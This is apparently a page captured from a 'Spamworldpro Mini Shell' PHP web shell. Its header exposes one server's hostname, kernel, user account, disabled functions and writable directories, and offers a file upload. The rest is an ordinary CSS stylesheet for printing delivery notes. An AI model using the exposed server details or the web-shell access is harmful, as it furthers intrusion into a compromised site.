Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/mcoil.corals.io/public/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/mcoil.corals.io/public/css/custom-print.css
@media screen and (min-width: 768px) {
    .modal-dialog.deliveries-modal {
        width: auto;
        min-width: 600px;
        max-width: 1000px;
        margin: 30px auto;
    }
}
.bg-th-grey {
    background-color: #ddd !important;
}
.row-flex {
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
}
.col {
  position: relative;
  width: 100%;
  min-height: 1px;
  padding-right: 15px;
  padding-left: 15px;
}
.col {
  -ms-flex-preferred-size: 0;
  flex-basis: 0;
  -ms-flex-positive: 1;
  flex-grow: 1;
  max-width: 100%;
}
.printdeliveries-temp-outter {
    clear: both;
}
.deliveries-div {
  min-width: 600px;
}
#deliveries-temp{
  padding: 30px;
  max-width: 100%;
}
.deliveries-temp {
  position: relative;
  background-color: #ffffff;
  min-height: 680px;
  padding: 15px;
}
.deliveries-temp-logo img {
  max-width: 100%;
  height:auto;
}
.deliveries-temp header {
  padding: 10px 0;
  margin-bottom: 20px;
}
.deliveries-temp .company-details {
  text-align: right;
}
.deliveries-temp .company-details .name {
  margin-top: 0;
  margin-bottom: 0;
  color: #000;
  font-weight:900;
}
.deliveries-temp .contacts {
  margin-bottom: 20px;
}
.deliveries-temp .deliveries-temp-to {
  text-align: left;
}
.deliveries-temp .deliveries-temp-to .to {
  margin-top: 0;
  margin-bottom: 0;
  color: #000;
  font-weight:900;
}
.deliveries-temp .deliveries-temp-details {
  text-align: right;
}
.deliveries-temp .deliveries-temp-details .deliveries-temp-id {
  margin-top: 0;
  color: #a9140f;
}
.deliveries-temp .deliveries-temp-details h1.deliveries-temp-id {
  font-size: 2.5rem;
  text-align:right;
  font-weight:900;
}
.deliveries-temp .deliveries-temp-details .deliveries-temp-pending {
  margin-top: 0;
  color: #ffc107;
  border: 2px solid #ffc107;
  border-right: 60px solid #ffc107;
  border-left: 60px solid #ffc107;
  text-align: center;
  font-size: 35px;
  line-height: 1.2;
}
.deliveries-temp .deliveries-temp-details .deliveries-temp-unpaid {
  margin-top: 0;
  color: #a9140f;
  border: 2px solid #a9140f;
  border-right: 60px solid #a9140f;
  border-left: 60px solid #a9140f;
  text-align: center;
  font-size: 35px;
  line-height: 1.2;
}
.deliveries-temp .deliveries-temp-details .deliveries-temp-driver {
  margin-top: 0;
  color: #a9140f;
  border: 2px solid #a9140f;
  border-right: 60px solid #a9140f;
  border-left: 60px solid #a9140f;
  text-align: center;
  font-size: 35px;
  line-height: 1.2;
}
.deliveries-temp main {
  padding-bottom: 50px;
}
.deliveries-temp .notices .deliveries-delivery {
  margin-top: 0;
  color: #a9140f;
}
.deliveries-temp .notices h1.deliveries-delivery {
  padding-top: 5px;
  font-size: 20px;
  font-weight:900;
}
.deliveries-temp .notices {
  padding-left: 6px;
  border-left: 6px solid #a9140f;
  margin-bottom: 30px;
}
.deliveries-temp .notices .notice {
  font-size: 12px;
}
.deliveries-temp table {
  width: 100%;
  border-collapse: collapse;
  border-spacing: 0;
  margin-bottom: 20px;
}
.deliveries-temp table td,.deliveries-temp table th {
  padding: 15px;
  background: #eeeeee;
  border-bottom: 1px solid #fff;
}
.deliveries-temp table th {
  white-space: nowrap;
  font-weight: 400;
  font-size: 16px;
}
.deliveries-temp table td h3 {
  margin: 0;
  font-weight: 400;
  color: #a9140f;
  font-size: 1.2em;
  text-align:left;
}
.deliveries-temp table .maintitle {
  text-align: right;
  font-size: 1.2em;
  width: 60%;
}
.deliveries-temp table .qty,.deliveries-temp table .total,.deliveries-temp table .unit {
  text-align: right;
  font-size: 1.2em;
  width: 10%;
}
.deliveries-temp table .no {
  color: #000000;
  font-size: 1.6em;
  background: #dddddd;
  width: 10%;
}
.deliveries-temp table .unit {
  background: #dddddd;
}
.deliveries-temp table .total {
  background: #dddddd;
  color: #000000;
}
.deliveries-temp table tbody tr:last-child td {
  border: none;
}
.deliveries-temp table tfoot td {
  background: 0 0;
  border-bottom: none;
  white-space: nowrap;
  text-align: right;
  padding: 10px 20px;
  font-size: 1.2em;
  border-top: 1px solid #ffffff;
  font-weight: 600;
}
.deliveries-temp table tfoot tr:first-child td {
  border-top: 1px solid #ffffff;
}
.deliveries-temp table tfoot tr:last-child td {
  color: #a9140f;
  font-size: 1.4em;
  border-top: 1px solid #a9140f;
}
.deliveries-temp table tfoot tr td:first-child {
  border: none;
}
.deliveries-temp footer {
  width: 100%;
  text-align: center;
  color: #777;
  border-top: 1px solid #aaaaaa;
  padding: 8px 0;
}
td.footertotal {
  background-color: #f6f6f6 !important;
}
@media print {
    * {
        color-adjust: exact;
        -webkit-print-color-adjust: exact;
        print-color-adjust: exact;
    }
    body, table, thead, tbody {
        width: 100%;
        -webkit-print-color-adjust: exact;
        color-adjust: exact;
        print-color-adjust: exact;
    }
    body {
        line-height: 17px !important;
        background-color: none !important;
    }
    .content-wrapper {
        background-color: none !important;
    }
    .deliveries-temp table th {
        background: #dddddd !important;
        border-bottom: 1px solid #fff;
        font-size:14px;
        color: #ffffff !important;
    }
    .deliveries-temp-th {
        color: #ffffff !important;
    }
    .deliveries-temp table td {
        background: #eeeeee !important;
        border-bottom: 1px solid #fff;
        font-size:12px;
    }
    body.modal-open {
        visibility: hidden;
    }
    body.modal-open .modal .modal-header, body.modal-open .modal .modal-body {
        visibility: visible;
    }
    .modal-backdrop {
        background-color: #fff !important;
    }
    .modal-backdrop.in {
        filter: alpha(opacity=0);
        opacity: 0;
    }
    .modal-dialog .modal-content, .modal-body {
        padding: 0px !important;
        margin: 0px !important;
    }
    .modal-dialog.deliveries-modal {
        width: 100%;
        min-width: 100%;
        max-width: 100%;
        margin: 0px !important;
    }
    .modal-dialog {
        margin: 0px !important;
    }
    .modal-content {
        -webkit-box-shadow: 0 !important;
        box-shadow: 0 !important;
        position: relative;
        background-color: #fff;
        background-clip: padding-box;
        border: 0px !important;
        border-radius: 0px !important;
        outline: 0;
    }
    head, section, footer, hr, .hidden-print {
        display: none !important;
    }
    #modal_body_show_deliveries, #deliveries_print_copy, #deliveries-temp{
        padding: 0px;
        max-width: 100%;
        border: none !important;
    }
    .deliveries-temp {
        font-size: 11px !important;
        overflow: hidden !important;
    }
    .deliveries-temp .deliveries-temp-details .deliveries-temp-id, .deliveries-temp .notices h1.deliveries-delivery, .deliveries-temp table td h3, .deliveries-temp table tfoot tr:last-child td {
        color: #a9140f !important;
    }
    .deliveries-temp .notices h1.deliveries-delivery {
      padding-top: 5px;
      font-size: 18px;
      font-weight:900;
    }
    .deliveries-temp .notices {
      padding-left: 6px;
      border-left: 6px solid #a9140f;
      margin-bottom: 25px;
    }
    .deliveries-temp footer {
        position: absolute;
        bottom: 10px;
        page-break-after: always;
    }
    .deliveries-temp>div:last-child {
        page-break-before: always;
    }
    div.divFooter {
        position: fixed !important;
        bottom: 0px !important;
    }
}

Spamworldpro Mini